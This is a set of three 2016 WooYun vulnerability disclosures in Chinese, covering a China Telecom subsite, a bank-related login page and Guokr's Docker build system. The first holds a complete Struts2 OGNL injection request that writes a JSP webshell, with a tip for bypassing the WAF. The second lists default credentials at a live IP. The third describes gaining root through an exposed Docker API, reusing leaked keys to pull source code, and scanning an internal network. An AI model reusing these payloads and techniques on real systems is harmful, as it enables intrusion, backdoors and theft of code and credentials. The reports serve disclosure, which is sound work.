漏洞详情披露状态： 2016-04-25： 细节已通知厂商并且等待厂商处理中2016-04-28： 厂商已经确认，细节仅向厂商公开2016-05-08： 细节向核心白帽子及相关领域专家公开2016-05-18： 细节向普通白帽子公开2016-05-28： 细节向实习白帽子公开2016-06-12： 细节向公众公开简要描述：中国电信189.cn某分站命令执行漏洞修复不当导致getshell有简单的waf防护详细说明：http://**.**.**.** st2命令执行漏洞code 区域POST / HTTP/1.1 User-Agent: curl/7.33.0 Host: **.**.**.** Accept: */* Proxy-Connection: Keep-Alive Content-Length: 204 Content-Type: multipart/form-data;boundary=------------------------ -------------------------- Content-Disposition: form-data; name="redirect:/${#context.get("com.opensymphony.xwork2.dispatcher.HttpServletRequest").getRealPath("/")}" -1 -------------------------- 漏洞证明： code 区域POST / HTTP/1.1 User-Agent: curl/7.33.0 Host: **.**.**.** Accept: */* Proxy-Connection: Keep-Alive Content-Length: 1727 Content-Type: multipart/form-data;boundary=------------------------ -------------------------- Content-Disposition: form-data; name="redirect:/${"x"+(new **.**.**.**.PrintWriter("/home/ecss/emallTelWeb8082/webapps/emallTelWeb/ss.jsp")).append("\u003c\u0025\u0040\u0070\u0061\u0067\u0065\u0020\u0069\u006d\u0070\u006f\u0072\u0074\u003d\"\u0073\u0075\u006e\u002e\u006d\u0069\u0073\u0063\u002e\u0042\u0041\u0053\u0045\u0036\u0034\u0044\u0065\u0063\u006f\u0064\u0065\u0072\"\u0025\u003e\u003c\u0025\u0042\u0041\u0053\u0045\u0036\u0034\u0044\u0065\u0063\u006f\u0064\u0065\u0072\u0020\u0064\u0065\u0063\u006f\u0064\u0065\u0072\u0020\u003d\u0020\u006e\u0065\u0077\u0020\u0042\u0041\u0053\u0045\u0036\u0034\u0044\u0065\u0063\u006f\u0064\u0065\u0072\u0028\u0029\u003b\u006e\u0065\u0077\u0020\u006a\u0061\u0076\u0061\u002e\u0069\u006f\u002e\u0046\u0069\u006c\u0065\u004f\u0075\u0074\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0028\u0061\u0070\u0070\u006c\u0069\u0063\u0061\u0074\u0069\u006f\u006e\u002e\u0067\u0065\u0074\u0052\u0065\u0061\u006c\u0050\u0061\u0074\u0068\u0028\"\u002f\"\u0029\u002b\"\u002f\"\u002b\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u002e\u0067\u0065\u0074\u0050\u0061\u0072\u0061\u006d\u0065\u0074\u0065\u0072\u0028\"\u0066\"\u0029\u0029\u002e\u0077\u0072\u0069\u0074\u0065\u0028\u0028\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u0028\u0064\u0065\u0063\u006f\u0064\u0065\u0072\u002e\u0064\u0065\u0063\u006f\u0064\u0065\u0042\u0075\u0066\u0066\u0065\u0072\u0028\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u002e\u0067\u0065\u0074\u0050\u0061\u0072\u0061\u006d\u0065\u0074\u0065\u0072\u0028\"\u0063\"\u0029\u0029\u0029\u0029\u002e\u0067\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0028\u0029\u0029\u003b\u0025\u003e").close()}" -1 --------------------------写小马 然后写入菜刀马（base64加密提交即可绕过waf） 修复方案： 版权声明：转载请注明来源 撸撸侠@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：11确认时间：2016-04-28 14:06厂商回复：CNVD确认并复现所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理部门处置.最新状态：暂无

漏洞详情披露状态： 2016-05-10： 细节已通知厂商并且等待厂商处理中2016-05-10： 厂商已查看当前漏洞内容,细节仅向厂商公开2016-05-15： 厂商已经主动忽略漏洞，细节向公众公开简要描述：广发银行某站一处弱口令详细说明：http://58.20.232.155:82/OpenPage/Login.aspxadmin admin  漏洞证明：RT修复方案： 版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：无影响厂商忽略忽略时间：2016-05-15 15:20厂商回复： 漏洞Rank：8 (WooYun评价)最新状态：2016-05-16：并非我行系统，是外部厂商部署的测试环境，已通知厂商关闭。感谢白帽子对我行业务的关注。2016-05-16：是产品演示环境，还不是测试环境。

漏洞详情披露状态： 2016-05-16： 细节已通知厂商并且等待厂商处理中2016-05-16： 厂商已查看当前漏洞内容,细节仅向厂商公开2016-05-21： 厂商已经主动忽略漏洞，细节向公众公开简要描述：新姿势～可获取 果壳，mooc，在行等全站代码并获取机器root权限详细说明：0x00 简介果壳自动化build docker image的系统code 区域http://builder.iguokr.com/#/signin通过之后的分析，发现是通过gitlab hook，当代码变更时，自动触发image build过程，通过将代码和运行环境打包到 docker image里，实现自动化和快速部署0x01 漏洞原因docker engine daemon api直接暴露公网code 区域mask 区域1.http://**.**.** 还有很多其他ip也开放2375端口，请厂商自查也就是说，docker能做的所有操作，这里都可以做比如：运行、删除container，拉取image等等0x02 漏洞证明查看当前运行的containerdocker 命令行（需要安装docker）code 区域mask 区域*****54.223.50*****  或直接访问code 区域mask 区域1.http://**.**.**/containers/json  CLI结果code 区域mask 区域***** CREATED STATUS ***** ***** 4 days ago Up 4 days ***** ***** 4 days ago Up 4 days ***** ***** 4 days ago Up 4 days ***** ***** 4 days ago Up 4 days ***** ***** 4 days ago Up 4 days ***** ***** 4 days ago Up 4 days ***** ***** 4 days ago Up 4 days ***** *****.s" 4 days ago Up 4 days ***** *****ntrypoint.sh redis" 4 days ago *****  已证明，其他不列出漏洞证明：0x03 脑洞大开我们现在能做的只是运行docker的一些命令，比如操作container、image，没法直接控制宿主机那么怎么才能控制宿主机呢？先分析下：docker的运行需要root权限的，即我们有一个以root运行的进程但docker本身执行命令只能在container内部，与宿主机是隔离的，即使是反弹一个shell，控制的也是container，除非有溢出漏洞，然而我并没有～那么我们来看一下docker本身能够做什么？脑洞开了下，想到docker 运行 container的时候，可以将本地文件或目录作为volume挂载到container内，并且在container内部，这些文件和目录是可以修改的。这里一下就想到了redis + ssh漏洞，非常的像我们看一下服务器是否开放22端口，bingo，有ssh服务器code 区域mask 区域*****23.50.***** *****23.50.***** *****54.223.***** *****is '***** *****.1p1 Ubunt*****  那么直接把/root/.ssh目录挂载到container内，比如/tmp/.ssh，然后修改/tmp/.ssh/authorized_keys文件，把自己的public key写进去，然后就可以了登录0x04 获取机器root权限这里具体命令就不给了，只给出证明 ifconfigcode 区域mask 区域*****1-1-228***** *****(root) gr*****  /home/ubuntu目录下文件code 区域mask 区域*****8:/home/ub***** ***** 18***** *****tu 163 Sep 24***** *****ubuntu 4.0K ***** *****untu 4.0K Apr***** *****tu 4.0K Sep 7***** ***** 77 Apr 8 05:50***** *****untu 4.0K Dec***** *****tu 4.0K Nov 12***** *****ubuntu 4.0K ***** *****untu 4.0K May***** *****ot 4.0K Dec***** *****.7K Apr 28 10:20***** *****tu 472K Dec 17***** *****tu 1.3K Feb 3***** *****untu 4.0K Nov***** *****root 4.0K ***** *****tu 4.0K Mar 8***** *****22M Mar 2 20:10***** *****untu 4.0K Mar***** *****tu 1.2K Feb 11***** ***** 14M Dec 17 03***** *****tu 4.0K Feb 23***** *****untu 4.0K May***** ***** 110M Dec 3 09***** *****untu 243 Nov***** *****M Jul 31 2015 so***** *****untu 4.0K Jan***** *****untu 689 Nov*****  docker仓库在内网 docker-registry.guokr.com code 区域ping docker-registry.guokr.com PING ec2-54-222-135-194.cn-north-1.compute.amazonaws.com.cn (172.31.14.62) 56(84) bytes of data.0x04 获取全站源代码对当前docker运行的container进行了查看和分析，发现image build的过程会从code 区域git.iguokr.com拉取源代码，这里是用了public key验证，找了找，在代码中发现了私钥和公钥且git.iguokr.com公网开放有了密钥，看到builder有一个postgresql数据库，可以公网连接，在代码中找到帐号和密码连接后发现有git repository列表，这里给出部分 里面有果壳，在行，mooc等全站代码，git clone一份，给出证明0x05 哎～在机器上装了个nmap，对所在网段的b段扫了下2375端口，扫到了一些只有内网才能访问的2375端口，并且都有ssh服务，都可以拿到root权限，这里就不贴了，和这个类似。本来想试试能不能撸到线上，结果发现线上环境在另一个网段，试了试还是放弃了修复方案：禁止外网访问～版权声明：转载请注明来源 黑客,绝对是黑客@乌云漏洞回应厂商回应：危害等级：无影响厂商忽略忽略时间：2016-05-21 14:40厂商回复： 漏洞Rank：15 (WooYun评价)最新状态：暂无